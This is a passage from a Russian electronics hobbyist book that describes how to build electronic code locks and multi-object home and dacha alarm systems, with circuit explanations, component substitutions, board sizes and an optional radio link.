Рис. 6.13. Электронный кодовый замок

Изображение: 

Рис. 6.14. Печатная плата электронного замка

Изображение: 

Рис. 6.15 Размещение детален на плате электронного замка

Изображение: 

6.1.8. Кодовый замок с пятизначным кодом.

6. 1. 8. Кодовый замок с пятизначным кодом

Кодовый замок, принципиальная схема которого изображена на рис. 6. 16, обладает высокой надежностью и устойчивостью к вибрациям, потребляет малую мощность и имеет небольшие размеры. Код замка состоит из пяти цифр, причем две последние повторяют две предыдущие.

Замок содержит наборное поле из кнопок SB1—SB 10 и дверную кнопку SB11, кодозадающий разъем X1, элементы совпадения DD1. 4, DD2. 4, DD3. 3, DD4. 3

6-1-81.jpg

Рис. 6. 16. Принципиальная электрическая схема кодового замка

и четыре триггера на элементах DD 1. 1, DD1. 2, DD2. 1, DD2. 2, DD3. 1, DD3. 2, DD4. 1, DD4. 2, ключевой каскад на транзисторе VT1 и тиристоре VS1, электромагнит YA1 и индикатор HL1.

В исходном состоянии (при закрытой двери) контакты дверной кнопки SB11 разомкнуты, и все триггеры находятся в состоянии, при котором на выводах 4 элементов DD1. 2, DD2. 2, DD3. 2 присутствует напряжение высокого уровня. При этом на базе транзистора VT1 будет напряжение низкого уровня, ключевой каскад закрыт, элементы YA1 и индикатор HL1 обесточены.

При управлении замком применяют пятизначный код, но для его набора используют только три кнопки, две из них нажимают дважды. Эти кнопки и служат «ключом» к замку. Код замка задают штепсельной частью разъема XI. Для этого его контакты распаивают следующим образом: контакт 11 соединяют с контактом, к которому подключена кнопка с цифрой, стоящей в коде первой;

контакт 12 — с кнопкой, соответствующей второй цифре кода, а контакт 13 — третьей. Оставшиеся контакты соединяют вместе. Таким образом, код замка содержит три основные начальные цифры. Две следующие дополнительные цифры повторяют две предыдущие. На схеме (рис. 6. 16) распайка показана для кода «21818».

Нажатием кнопки, соответствующей первой цифре кода, переключается триггер на элементах DD1. 2, DD1. 1. Напряжение высокого уровня с него поступает на вывод 12 элемента совпадения DD1. 4. При нажатии следующей кнопки (вторая цифра кода) на вывод 13 элемента DD1. 4 поступает уровень логической единицы, что приводит к переключению триггера на элементах DD2. 1 и DD2. 2. С его выхода (вывод 3) высокий уровень поступает на вход элемента совпадения DD2. 4 (вывод 12). Таким же образом при наборе третьей цифры кода переключится триггер на элементах DD3. 1, DD3. 2, а через элемент совпадения DD3. 3 после набора четвертой цифры кода — триггер на элементах DD4. 1, DD4. 2.

В результате такого последовательного переключения всех триггеров на один из входов элемента совпадения DD4. 3 поступает напряжение высокого уровня. Такой же уровень воздействует и на второй вход DD4. 3 через резистор R4. После набора пятой цифры кода на третьем входе элемента совпадения DD4. 3 также появится напряжение высокого уровня, а на его выходе — напряжение низкого уровня. Этот сигнал инвертируется элементом DD3. 4, и на базу транзистора VT1 через резистор R5 поступает уровень логической единицы. Транзистор VT1 открывается, что ведет к открыванию тиристора VS1, замыкающего цепь питания обмотки электромагнита YA1. Электромагнит срабатывает и оттягивает задвижку или защелку замка.

Если в процессе набора кода будет нажата кнопка с цифрой, не входящей в него, то все триггеры возвратятся в исходное состояние. После этого код нужно набирать заново. Триггеры устанавливаются в исходное состояние и при открывании двери. Сброс в этом случае осуществляется кнопкой SB11.

Во избежание ложного срабатывания электромагнита при подаче напряжения питания включена цепь R4, С2. При появлении напряжения питания напряжение

6-1-82.jpg

Рис. 6. 17. Блок питания замка

на конденсаторе С2 возрастает постепенно, благодаря чему все триггеры устанавливаются в исходное состояние. Конденсатор С1 предотвращает ложное срабатывание устройства от помех по цепям питания.

Блок питания замка (рис. 6. 17) содержит сетевой трансформатор Т1, мостовой выпрямитель VD1 и стабилизатор напряжения DA1.

В устройстве могут использоваться трансформаторы ТПП-112, ТПП-230, ТПП-230 и другие, обеспечивающие на обмотке II напряжение 10—15 В и мощность нагрузки более 5 Вт. Конструкция электромагнита показана на рис. 6. 18.

6-1-83.jpg

Рис. 6. 18. Конструкция электромагнита кодового замка

Электромагнит состоит из каркаса 1 с обмоткой, неподвижного магнитопровода 2 и подвижного магнитопровода 3. Обмотка содержит 4000 витков провода ПЭВ-2 0, 41 мм. Неподвижный магнитопровод увеличивает магнитный поток в электромагните. Подвижный магнитопровод должен свободно перемещаться в окне катушки. Оба магнитопровода изготовляют из мягкого железа.

Микросхемы серии К561 можно заменить на аналогичные серии К176 без каких-либо переделок печатной платы. Транзистор VT1 можно заменить на КТ3102, МП38А. Тиристор VS1 можно заменить на КУ202М. Индикатор HL1 -любая маломощная лампа накаливания на напряжение 220 В, она может, например, подсвечивать надпись «Входите».

Устройство выполнено на плате из двухстороннего стеклотекстолита размером 65х45 мм (рис. 6. 19). Размещение деталей на плате показано на рис. 6. 20.

6-1-84.jpg

Рис. 6. 19. Печатная плата кодового замка

6-1-85.jpg

Рис. 6. 20. Размещение деталей на плате кодового замка

Рис. 6.16. Принципиальная электрическая схема кодового замка

Изображение: 

Рис. 6.17. Блок питания замка

Изображение: 

Рис. 6.18. Конструкция электромагнита кодового замка

Изображение: 

Рис. 6.19. Печатная плата кодового замка

Изображение: 

Рис. 6.20. Размещение деталей на плате кодового замка

Изображение: 

6.1.9. Кодовый замок-звонок.

6. 1. 9. Кодовый замок-звонок

У описываемого варианта кодового замка отсутствует традиционное наборное кнопочное поле. Конструкция выполнена на микросхемах ТТЛ, широко применяемых радиолюбителями. Код набирают одной кнопкой — последовательным нажатием и отпусканием. Она одновременно выполняет функцию кнопки дверного звонка, причем на время набора кода звонок отключается. При этом электронный блок замка формирует состоящее из нулей и единиц восьмиразрядное двоичное число. Введению единицы соответствует замыкание контактов кнопки в течение 1—2 с, а нуля — менее 1 с. Схема этого устройства приведена на рис. 6. 21.

При первом нажатии на кнопку в квартире раздается звуковой сигнал, а после ее отпускания устройство блокирует подачу сигнала на три секунды. За это время необходимо приступить к набору кода. Если период между нажатием не превышает трех секунд, то набор кода происходит без включения сигнала звонка, т. к. каждое очередное размыкание контактов кнопки продлевает блокировку звукового сигнала на три секунды.

После набора кода необходимо еще раз нажать кнопку и удерживать ее в этом состоянии. Если код набран верно, через две секунды сработает электромагнит замка и дверь откроется.

Необходимо помнить, что при наборе кода кнопку нельзя удерживать нажатой более двух секунд, иначе замок окажется блокированным в течение двадцати секунд и не будет реагировать на дальнейшие нажатия. Все эти меры существенно повышают секретность замка и сводят до минимума возможность подбора кода.

При замыкании контактов кнопки SB1 генератор, выполненный на триггере Шмитта DD2. 4, начинает вырабатывать прямоугольные импульсы частотой 1 кГц. Одновременно включается генератор, выполненный на элементах DD1. 3 и DD1. 4, вырабатывающий колебания частотой 6 Гц. Выходные импульсы этого генератора подсчитывает счетчик DD3, на основе которого выполнен делитель частоты на 6 (вывод 8) и на 12 (вывод 12).

В зависимости от длительности нажатия на кнопку SB1 на выводе счетчика DD3 устанавливается напряжение либо нулевого, либо единичного уровня. Каждое очередное замыкание контактов обнуляет счетчик — импульс обнуления формирует дифференцирующая цепь C4R9.

На триггерах микросхем DD5, DD6 выполнен сдвиговый регистр, который служит для формирования и хранения кодового слова, набираемого кнопкой SB1. Если оно соответствует слову, установленному шифратором на переключателях SA2 — SA9, то на все входы элемента совпадения DD7 поступает напряжение высокого уровня. На выходе этого элемента устанавливается напряжение низкого уровня, которое закрывает транзистор VT2, и на вывод 5 элемента DD1. 2 поступает напряжение высокого уровня с коллектора транзистора VT2;

светодиод HL1 гаснет.

6-1-91.jpg

Рис. 6. 21. Принципиальная электрическая схема кодового замка-звонка

На элементах DD1. 1 и DD1. 2 выполнен генератор прямоугольных импульсов частотой 10 кГц. Генератор запускается лишь в том случае, если на вывод 1 элемента DD1 1 будет подано напряжение высокого уровня.

Импульсы генератора, усиленные транзистором VT3, используются для управления работой тиристора VS1. При открывании тиристора VS1 срабатывает электромагнит YA1 привода защелки — замок открывается.

Система блокировки выполнена на микросхеме DD4. На одновибраторе DD4. 2 собрано устройство трехсекундной блокировки звукового сигнала звонка. В начальный момент, когда на кнопку звонка нажали первый раз, на вывод

6-1-92.jpg

Рис. 6. 22. Печатная плата замка-звонка

9 триггера Шмитта DD2. 3 с инверсного выхода одновибратора DD4. 2 (вывод 12) поступает напряжение высокого уровня. В результате этого импульсы с генератора DD2. 4 проходят на вход транзисторного ключа VT1, нагрузкой которого служит телефон BF1. Тональность звукового сигнала задается генератором на триггере Шмитта DD2. 4.

При размыкании контактов кнопки SB1 выходной уровень триггера Шмитта DD2. 2 (вывод 6) изменяется с низкого на высокий. Положительный перепад напряжения запускает одновибратор DD4. 2, и на его инверсном выходе (вывод 12) уровень изменяется с высокого на низкий. Длительность формируемого импульса низкого уровня устанавливается равной трем секундам выбором параметров времязадающей цепи C6R11. Поэтому сигнал генератора на триггере Шмитта DD2. 4 в течение трех секунд не поступает на базу транзистора VT1 — звонок блокирован. Переключателем SA1 можно отключить блокировку.

На одновибраторе DD4. 1 выполнено устройство двадцати секундной блокировки набора кода замка. Как только длительность нажатия на кнопку SB1 превысит 2 с, отрицательный перепад напряжения с вывода 12 счетчика DD3 запустит одновибратор DD4. 1.

Выходной импульс низкого уровня с инверсного выхода одновибратора DD4. 1 (вывод 4) обнулит содержимое регистров DD5, DD6. Длительность импульса устанавливают равной 20 с подбором параметров времязадающей цепи C5R10. В течение этого времени запись кода в регистры не происходит.

Триггеры Шмитта DD2. 1, DD2. 2 устраняют импульсы дребезга контактов кнопки SB1, а также формируют сигналы, управляющие работой блока.

Для питания устройства подойдет любой стабилизированный источник питания напряжением 5 В, рассчитанный на ток нагрузки не менее 0, 25 А. Устройство смонтировано на печатной плате рис. 6. 22. размером 65х120 мм из двухстороннего фольгированного стеклотекстолита толщиной 2 мм. Размещение деталей устройства на плате показано на рис. 6. 23.

6-1-93.jpg

Рис. 6. 23. Размещение детален на плате замка-звонка

Шифратор выполнен на малогабаритных переключателях. Трансформатор Т1 выполнен на магнитопроводе типоразмера К10х6хЗ из феррита марки 1500НМ. Обе обмотки содержат по 100 витков провода ПЭВ 0, 17 мм.

Пользование замком требует определенного навыка, поэтому перед началом эксплуатации следует потренироваться. Для этого тумблер SA1 устанавливает в нижнее по схеме положение, когда трехсекундная блокировка отключена, и переключателями SA2—SA9 устанавливают кодовое слово 10000000. Короткими нажатиями на кнопку SB1 вводят нули. Длительность нажатия на кнопку, соответствующую введению единицы, определяют по моменту отключения светодиода HL1.

После тренировки устанавливают выбранное кодовое слово. Переключатель SA1 возвращают в верхнее положение. Замок готов к работе.

Рис. 6.21. Принципиальная электрическая схема кодового замка-звонка

Изображение: 

Рис. 6.22. Печатная плата замка-звонка

Изображение: 

Рис. 6.23. Размещение детален на плате замка-звонка

Изображение: 

6.2. Охранные системы и устройства..

6.2. Охранные системы и устройства.

6.2.1. Охранное устройство на несколько объектов.

6. 2. 1. Охранное устройство на несколько объектов

Устройство предназначено для охраны квартир, дач, офисов, гаражей и т. д. Оно позволяет контролировать до 8 объектов. Количество объектов при желании может быть увеличено до любого числа. Устройство позволяет использовать автономное питание. Предусмотрена возможность наращивания до любого числа контролируемых объектов, используя модульное построение устройства. При этом индицируется срабатывание сигнализации по каждому объекту отдельно. Срабатывание схемы на размыкание контактов позволяет контролировать целостность линии. При срабатывании сигнализации осуществляется ее автоматическая блокировка.

6-2-11.jpg

Рис. 6. 43. Охранное устройство на 8 объектов

Основные характеристики устройства:

Напряжение питания, В....................................................................... 12

Потребляемый ток:

в режиме охраны не более, мА........................................................ 50

в режиме тревоги, А..................................................................... 1, 5

Принципиальная схема охранного устройства на 8 объектов представлена на рис. 6. 43. За основу устройства взята типовая схема модуля выбора программ (МВП) телевизионных приемников на микросборке К04КП024А. Работа микросхемы DD1 типа К04КП024А заключается в следующем. При подаче на один

6-2-12.jpg

Рис. 6. 44. Печатная плата блока А1

из входов (выводы 11, 6, 8, 10, 4, 5, 7 или 9) положительного напряжения на двух выходах микросхемы появляется низкий уровень напряжения. Один выход (выводы 12, 14, 16, 18, 25, 27, 1 или З) служит для включения определенной программы, а другой (выводы 13, 15, 17, 19, 24, 26, 28 или 2 соответственно) — для включения индикации этой программы.

Стандартная схема включения микросборки К04КП024А дополнена ключами на транзисторах VT1 —VT8, а выходы микросхемы DD1 объединены в две шины через диоды VD1 —VD8 и светодиоды HL1 —HL8 соответственно.

При размыкании одного из контактов переключателей SA1 — SA8 открывается соответствующий транзисторный ключ (транзисторы VT1—VT8). Положительное напряжение через резистор R 17 и открытый транзистор поступает на вход

6-2-13.jpg

Рис. 6. 45. Печатная плата блока индикации

6-2-14.jpg

Рис. 6. 46. Размещение деталей на плате блока индикации и блока А1

микросхемы DD1, соответствующий разомкнутому контакту. Допустим, что разомкнулся контакт SA1. Транзистор VT1 открылся, и на вход микросхемы DD1 (вывод 11) поступило положительное напряжение. При этом на выводах 12 и 13 микросхемы DD1 появится напряжение низкого уровня, благодаря чему включится светодиод HL1, служащий для индикации сработавшего датчика, и база транзистора VT9 (р-п-р) через резистор R19 и диод VD1 замкнется на минус источника питания.

Транзистор VT9 откроется, и положительное напряжение источника питания поступит на реле К1 и через диод VD9 на вывод 14 микросхемы DD2. Реле К1 сработает и своими контактами включит внешнюю нагрузку (лампу, звонок и т. п.). При подаче питания на микросхему DD2 начинает работать генератор прямоугольных импульсов на элементах DD2. 1, DD2. 2, резисторе R21 и конденсаторе С1. С выхода генератора (вывод 4 DD2. 2) импульсы с частотой 0, 1 — 1 Гц через цепь формирования треугольного напряжения, выполненную на резисторах R22, R23 и конденсаторе СЗ, поступают на генератор, управляемый напряжением, выполненный на элементах DD2. 3, DD2. 4, резисторах R24, R25 и конденсаторах С4, С5. Под действием треугольного напряжения частота на выходах элементов DD2. 3 и DD2. 4 изменяется, т. е. происходит качание частоты в диапазоне 300—1500 Гц. Прямоугольные импульсы изменяющейся частоты с противофазных выходов генератора (выводы 10 и 11) поступают на мостовой усилитель мощности, выполненный на транзисторах VT10—VT13. Нагрузкой усилителя служит динамическая головка В1. Для сброса блокировки необходимо кратковременно отключить питание кнопкой SA9. Светодиод HL9 сигнализирует о включении охранного устройства.

Устройство выполнено на двух печатных платах размером 65х80 мм из двухстороннего фольгированного стеклотекстолита (плата А1 и плата сигнализации). Такая конструкция позволяет наращивать число охраняемых объектов просто добавлением необходимого количества плат А1. Чертеж печатной платы блока А1 приведен на рис. 6. 44, а платы блока индикации — на рис. 6. 45. Размещение деталей на обоих платах показано на рис. 6. 46.

6-2-15.jpg

Рис. 6. 47. Соединение блоков для увеличения количества охраняемых элементов

6-2-16.jpg

Рис. 6. 48 Звуковой генератор с пьезоизлучателем

Если необходимо увеличить число охраняемых объектов, например на 1 —8, то необходимо изготовить еще один блок А1 и произвести соединение блоков, как показано на рис. 6. 47. Транзисторы VT14, VT15 и VT16, VT17 образуют попарно коммутационные ключи, блокирующие одну из микросхем.

В устройстве могут быть использованы резисторы МЛТ-0, 125 или МЛТ-0, 25. Допускается разброс номиналов резисторов ±15%. Диоды серии КД522 можно заменить на любые, например КД521, КД510, Д220, Д18, Д9. Вместо реле К1 типа РЭС-48 можно использовать любое с рабочим напряжением 9—12 В. Если необходимость коммутации внешних устройств отсутствует, то реле К1 и диод VD 10 можно из схемы исключить. Транзисторы типа КТ315 можно заменить на транзисторы КТ3102, транзисторы типа КТ361 — на КТ3107.

Если нет необходимости в мощном выходном каскаде, а достаточно только привлечь внимание оператора, то генератор на микросхеме DD2 с выходным усилителем мощности можно заменить на генератор, собранный по схеме, приведенной на рис. 6. 48. В качестве звукового излучателя можно использовать пьезокерамический преобразователь ZQ1 типа ЗП-1 (ЗП-22 и др.). Можно оставить и прежнюю схему, исключив из нее транзисторы VT10—VT13, излучатель В1. Пьезокерамический излучатель ZQ1 подключают между общим проводом и выводом 10 или 11 микросхемы DD2.

Устройство, собранное из заведомо исправных деталей, в налаживании не нуждается.

Рис. 6.43. Охранное устройство на 8 объектов

Изображение: 

Рис. 6.44. Печатная плата блока А1

Изображение: 

Рис. 6.45. Печатная плата блока индикации

Изображение: 

Рис. 6.46. Размещение деталей на плате блока индикации и блока А1

Изображение: 

Рис. 6.47. Соединение блоков для увеличения количества охраняемых элементов

Изображение: 

Рис. 6.48 Звуковой генератор с пьезоизлучателем

Изображение: 

6.2.2. Многоканальная охранная система.

6. 2. 2. Многоканальная охранная система

Многоканальная охранная система предназначена для организации охраны нескольких объектов, например дачных участков, или одного объекта, имеющего несколько помещений, нуждающихся в охране. Система подает сигнал по общей для всех датчиков двухпроводной шине и позволяет контролировать исправность датчиков путем световой и (или) звуковой сигнализации.

Система состоит из 12 идентичных блоков кодирования с датчиками тревожного сигнала и пульта декодирования и индикации, соединенных между собой общей двухпроводной линией связи. Работая поочередно, каждый блок кодирования выдает сигнал «Норма». Отсутствие сигнала от какого-либо блока воспринимается, как сигнал «Тревога», т. е. этот сигнал возникает либо при неисправности блока кодирования, либо при срабатывании охранного датчика.

При кодировании и декодировании сигналов используется число импульсный код. Первый датчик выдает в линию пачку из 3 импульсов, второй из 4 импульсов, последний, двенадцатый датчик, выдает 14 импульсов.

Блоки кодирования сделаны так, что они автоматически синхронизируются и выстраиваются в очередь в порядке возрастания числа импульсов в сигнале. Возможна работа системы при использовании от 1 до 12 блоков одновременно.

Система выполнена на КМОП микросхемах серии К176 и К561. Питание блоков кодирования происходит по линии связи.

Технические характеристики:

Число охраняемых объектов......................................................... до 12

Индикация состояния............................................... световая и звуковая

Напряжение питания, В..................................................................... 30

Потребляемый ток:

блок кодирования не более, мА........................................................ 1

блок индикации не более, мА........................................................ 100

Дальность действия, м................................................................. до 300

Размер плат:

блок кодирования, мм............................................................... 65х95

блок индикации, мм.............................................................. 115х 130

Рассмотрим работу системы, начиная с блока кодирования, принципиальная схема которого представлена на рис. 6. 49.

Все блоки кодирования выполнены по одинаковой схеме, поэтому рассмотрим работу только одного из них — первого. На его вход «Линия» приходят пачки импульсов отрицательной полярности амплитудой 30 В, формируемые поочередно другими блоками. Делитель, выполненный на резисторах R3 и R4, и транзистор VT1 образуют формирователь импульсов амплитудой 7—9 В, необходимых для нормальной работы КМОП микросхем. Элемент DD9. 1 формирует импульсы отрицательной полярности с крутыми фронтом и спадом. Цепь DD9. 2, R6, VD1, СЗ подавляет короткие импульсные помехи и формирует импульс отрицательной полярности, фронт которого совпадает с фронтом первого импульса в пачке на выходе элемента DD9. 1, а спад несколько задержан относительно спада последнего импульса пачки. Элемент DD9. 3, резистор R7 и конденсатор С4 образуют формирователь коротких положительных импульсов по фронту и спаду импульса с выхода элемента DDD9. 2. Эти короткие импульсы, пройдя через элементы DD10. 1, DD10. 2, устанавливают счетчики DD1 и DD3 в нулевое состояние. Счетчик DD3 во время паузы между пачками импульсов считает тактовые импульсы, поступающие на его вход С с тактового генератора через элементы DD2. 1, DD2. 2. Генератор тактовых импульсов выполнен на микросхеме DD1, частота которого стабилизирована кварцевым резонатором ZQ1. С вывода 11 микросхемы DD1 импульсы с частотой 32768 Гц поступают на вход делителя частоты на 64 (вывод 2). После деления импульсы с частотой 512 Гц с вывода 5 поступают на счетчик DD3 для определения длительности паузы между пачками импульсов.

6-2-21.jpg

Рис. 6. 49. Принципиальная схема блока кодирования

Применение кварцевого генератора обеспечивает высокую стабильность работы системы и исключает необходимость дополнительной подстройки всех генераторов. Работа тактового генератора и счетчика DD3 синхронизированы с началом и концом пачки импульсов, поступающих на их входы R. Счетчик DD3 во время паузы между пачками считает тактовые импульсы, следующие с частотой 512 Гц (вывод 5 микросхемы DD1), измеряя таким образом длительность паузы между пачками.

Если длительность паузы превышает 16 периодов тактовых импульсов, сигналом с выхода 16 (вывод 11) микросхемы DD3 D-триггер DD6. 2 устанавливается в единичное состояние (это происходит одновременно во всех блоках кодирования), после чего продолжается измерение паузы. И если перемычка в блоке кодирования соединяет вывод 15 микросхемы DD4 и вывод 4 элемента DD7. 1, то спустя три импульса после переключения триггера DD6. 2 сигнал логической единицы с выхода 3 дешифратора DD4 (вывод 15) переключает элемент DD7. 1, логический нуль с его выхода через элемент DD10. 2 устанавливает счетчики DD1 и DD3 в нулевое состояние, а триггер DD6. 1 — в единичное. Уровень логической единицы с прямого выхода триггера DD6. 1 разрешает прохождение тактовых импульсов через элементы DD7. 2 и DD7. 3 на базу транзистора VT3. При этом на его коллекторе формируется пачка из трех импульсов отрицательной полярности.

Нагрузкой транзистора VT3 служит резистор, находящийся в блоке индикации (R9). Счетчик DD3 считает импульсы в пачке, приходящие на его вход С (вывод 1) через элемент DD2. 2. По окончании третьего импульса на выходе 3 дешифратора DD4 (вывод 15) появляется логическая единица. Этот сигнал не включает элемент DD7. 1, т. к. на выходе элемента DD9. 2 присутствует логический нуль, но устанавливает триггер DD6. 1 в нулевое состояние, что, в свою очередь, переводит триггер DD6. 2 также в нулевое состояние. В результате блок кодирования прекращает выдачу импульсов до появления паузы длительностью 16 импульсов, которая во всех блоках кодирования переключает триггеры DD6. 2 в единичное состояние и активизирует их работу.

В том случае, если во втором блоке кодирования перемычка подключена в выводу 1 (выход 4) дешифратора DD4, то после паузы в четыре импульса этот блок выдает пачку из четырех импульсов и также прекратит работу до появления паузы длительностью 16 импульсов. Следующим сработает блок, в котором перемычка подключена к выходу 5 дешифратора DD4 (вывод 6), и выдаст 5 импульсов и т. д.

После срабатывания последнего из подключенных к системе блоков триггеры DD6. 1 всех блоков устройства запретят выдачу импульсов. Возникнет пауза длительностью 16 импульсов, активизирующая работу всех блоков. Далее цикл работы системы повторится.

Длительность полного цикла работы всех блоков кодирования при частоте тактовых импульсов 512 Гц составляет около 0, 5 с.

В зависимости от установленной перемычки блок кодирования выдает от 3 до 14 импульсов в пачке. На случай нарушения контакта введен резистор R8, обеспечивающий выдачу пачки из 15 импульсов.

6-2-22.jpg

Рис. 6. 50. Печатная плата блока кодирования

При срабатывании одного из охранных датчиков (SB1 —SBn) триггер DD8. 1 переключается, в единичное состояние, на его инверсном выходе (вывод 2) появляется уровень логического нуля, закрывающий элемент DD7. 2 и прекращающий выдачу импульсов в линию этим блоком. После восстановления контактов кнопок SB1 —SBn триггер DD8. 1 устанавливается в исходное состояние импульсом с вывода 11 счетчика DD11.

Питание блока кодирования осуществляется по линии связи от источника + 30 В. Транзистор VT2 выполняет функцию стабилитрона. Диод VD3 предотвращает разряд конденсатора С5 при прохождении пачек импульсов.

6-2-23.jpg

Рис. 6. 51. Размещение деталей на плате блока кодирования

Каждый из блоков кодирования выполнен на отдельной печатной плате размером 65х95 мм. Плата изготовлена из двухстороннего стеклотекстолита, ее внешний вид представлен на рис. 6. 50.

В блоке используются микросхемы серий К176, К561. Кварцевый рехонетор ZQ1 — часовой, с частотой резонанса 32768 Гц. Перемычка, определяющая номер блока и, соответственно, число импульсов в пачке, выполняется тонким монтажным проводом. Размещение деталей на плате блока кодирования представлено на рис. 6. 51.

Блок индикации выполнен в виде отдельной платы и размещается в одном корпусе с источником питания. Принципиальная схема блока индикации представлена на рис. 6. 52. Блок питания может использоваться любой на постоянное напряжение 30 В и ток не менее 0, 3 А. Питание блоков кодирования осуществляется по линии связи постоянном напряжением 30 В, а блока индикации — от стабилизатора, выполненного на специализированной микросхеме DA1 КР142ЕН8Г.

Импульсы, поступающие с линии, через делитель напряжения на резисторах Rl, R2 поступают на базу транзистора VT1, который совместно с элементом DD2. 1 образует формирователь импульсов с крутыми фронтами и спадами, тем самым повышая помехоустойчивость всей системы в целом. Элементы DD2. 2 и DD2. 3, а также R6, VD1, СЗ формируют импульс, фронт которого совпадает с фронтом первого импульса в пачке, а спад несколько задержан относительно спада последнего импульса в пачке. Нулевой уровень с выхода 3 элемента DD2. 3 закрывает элемент DD3. 1 и разрешает прохождение импульсов пачки на вход С (выход 1) счетчика DD5 через элемент DD3. 2.

6-2-24.jpg

Рис. 6. 52. Принципиальная схема блока индикации

На триггерах DD4. 1, DD4. 2 и счетчике DD6 выполнено устройство, формирующее импульсы записи и обнуления счетчиков DD1 и DD5. В исходном состоянии на вход С триггера DD4. 1 и вход СР счетчика DD6 поступают импульсы с тактового генератора (вывод 11 микросхемы DD1) частотой 32768 Гц. Однако счетчик DD6 эти импульсы не считает, т.к: на его входе R присутствует высокий логический уровень, поступающий с прямого выхода (выход 13) триггера DD4. 2. По фронту первого импульса пачки положительный перепад с вывода 4 элемента DD2. 2, продифференцированный цепью C4R7, устанавливает триггер DD4. 2 в нулевое состояние. Счетчик DD6 начинает считать тактовые импульсы. Положительный импульс с вывода 2 счетчика DD6 через диод VD2 устанавливает счетчики DD1 и DD5 в нулевое состояние, синхронизируя их работу. С приходом еще двух импульсов на счетчик DD6 единичный уровень появляется на выводе 4 счетчика и входе D триггера DD4. 1, при этом на выходе последнего появляется единичный уровень, запрещающий по входу CN счет импульсов со входа СР счетчика DD6. По окончании пачки импульсов положительным перепадом на входе R триггер DD4. 1 устанавливается в нулевое состояние. Счетчик DD6 вновь начинает считать тактовые импульсы. На его выходах появляются положительные импульсы. Первый из них (с вывода 10) производит запись информации в регистр DD7. На выходах последнего появляется код числа, соответствующего количеству импульсов в пачке. Этот код преобразуется дешифраторами DD8, DD9 в единичный уровень на одном из выходов, соединенных с соответствующим входом S триггеров DD10, DD11, DD12 соответственно. Уровень логической единицы фиксируется на соответствующем выходе этих триггеров.

Следующим положительным импульсом с выхода 6 счетчика DD6 (вывод 5) производится запись информации в D-триггеры DD13, DD14, DD15. Положительное напряжение, появляющееся на прямом выходе этих триггеров вызовет включение одного из светодиодов зеленого свечения (например, HL1), входящего в состав двухцветного светодиода типа АЛС331А. При отсутствии сигналов с блоков кодирования, соответствующие светодиоды загораются красным цветом. Для удобства пользования индикацию неиспользуемых каналов можно отключить переключателями SA1—SA12.

6-2-25.jpg

Рис. 6. 53. Принципиальная электрическая схема блока звуковой индикации

6-2-26.jpg

Рис. 6. 54. Печатная плата блока индикации

Очередным импульсом со счетчика DD6 (вывод 9) счетчики DD1 и DD5 устанавливаются (через диод VD3) в исходное состояние. А сам счетчик DD6 устанавливается в нулевое состояние, т. к. импульс с вывода 11 устанавливает триггер DD4. 2 в единичное состояние, в котором он будет находиться до прихода очередной пачки импульсов.

При отсутствии импульсов на входе блока счетчик DD5 считает тактовые импульсы частотой 512 Гц, поступающие с вывода 5 счетчика DD1 через элементы DD3. 1, DD3. 2. Во время паузы длительностью 16 тактов на выходе 16 (вывод 11) счетчика DD5 появится логическая единица и произойдет обнуление триггеров DD10, DD11, DD12. Устройство готово к приему нового пакета данных.

6-2-27.jpg

Рис. 6. 53. Размещение деталей на плате блока индикации

При необходимости блок индикации можно дополнить звуковой индикацией. Принципиальная схема блока звуковой индикации приведена на рис. 6. 53.

Блок состоит из задающего генератора звуковой частоты и схемы управления. Он подключается к инверсным выходам триггеров DD13, DD14, DD15. Когда на этих выходах появляется уровень логической единицы, индицирующий сигнал тревоги, загорается красный светодиод, через один из диодов VD4 —VD 15 быстро заряжается конденсатор С8 и уровень единицы с вывода 4 элемента DD16. 2 разрешает работу звукового генератора. При пропадании сигнала тревоги генератор работает еще некоторое время, до момента разряда конденсатора С8 через резистор R22. Переключатели SA13—SA24 служат для выборочного отключения звуковой индикации некоторых каналов. При желании возможно использовать сдвоенные переключатели (SA1 и SA13, SA2 и SA14 и т. д.) для одновременного отключения световой и звуковой индикации соответствующих каналов.

Блок индикации выполнен на микросхемах серий К176 и К561 и смонтирован на печатной плате из двухстороннего фольгированного стеклотекстолита размером 115х130 мм (рис. 6. 54).

Размещение деталей, включая светодиоды, показано на рис. 6. 55.

Устройство не вызывает особых трудностей в настройке, и если собрано из заведомо исправных деталей, сразу готово к использованию.

В качестве линии связи можно использовать обычную двухпроводную линию, провода которой желательно свить в жгут для уменьшения наводок и помех, или использовать экранированный провод.

Линия связи может быть и беспроводной. При этом можно воспользоваться ИК или радиоканалом. Рассмотрим подробнее организацию линии связи по радиоканалу, как наиболее предпочтительную. Для этого необходимо дополнить каждый блок кодирования передатчиком и радиоприемником, а блок индикации — только радиоприемником. Все передатчики могут работать на одной частоте. Питание блоков в этом случае должно осуществляться от автономного источника питания.

Принципиальная схема простейшего передатчика для блоков кодирования приведена на рис. 6. 56.

Передатчик работает на частоте 85 МГц. Модуляция осуществляется путем срыва ВЧ колебаний генератора, выполненного на транзисторе VT2 типа КТ606. Модулирующий сигнал снимается с коллектора транзистора VT3 блока кодирования (рис. 6. 49) и периодически закрывает транзистор VT1. При этом диод VD1 закрывается положительным напряжением, генератор возбуждается, излучая сигнал данного блока. При открывании транзистора VT1 база транзистора VT2 через диод VD1 замыкается на общий провод, генерация срывается. Таким образом осуществляется смешанная амплитудно-частотная модуляция. В данном случае прием сигнала возможен как на ЧМ, так и на AM приемник.

Транзистор VT2 можно заменить на КТ904 или КТ907. Дроссель Др1 намотан на корпусе резистора МЛТ-0, 5 сопротивлением более 100 кОм проводом

6-2-28.jpg

Рис. 6. 56. Схема передатчика блока кодирования

6-2-29.jpg

Рис. 6. 57. Приемное устройство блока кодирования

ПЭВ-1 0, 16 мм и имеет 60 витков. Катушки L1 и L2 бескаркасные диаметром 3 мм. Катушка L1 имеет 5 витков, катушка L2 — 1 виток, намотанный поверх катушки L1 проводом ПЭВ-1 0, 35 мм.

Настройка передатчика особенностей не имеет.

Приемник можно выполнить, например, по схеме, приведенной на рис. 6. 57.

Приемное устройство выполнено на двух специализированных микросхемах К174ХА34 и К174ХА10. Радиотракт выполнен на микросхеме DA1. Она содержит полный супергетеродинный тракт ЧМ приемника, и на ее выходе (вывод 14) формируется низкочастотный сигнал. Кроме того, микросхема содержит встроенную схему бесшумной настройки, что в данном случае очень важно, т. к. необходимо, чтобы в режиме ожидания приемник не воспринимал помехи. Частота настройки определяется контуром L1C6 гетеродина.

Усилитель 34 собран на микросхеме DA2, с выхода которой (вывод 12) сигнал поступает на резисторы R3 или R1 блоков кодирования или блока индикации соответственно. При этом номиналы резисторов уменьшают и подбирают при настройке по наиболее надежному срабатыванию устройства.

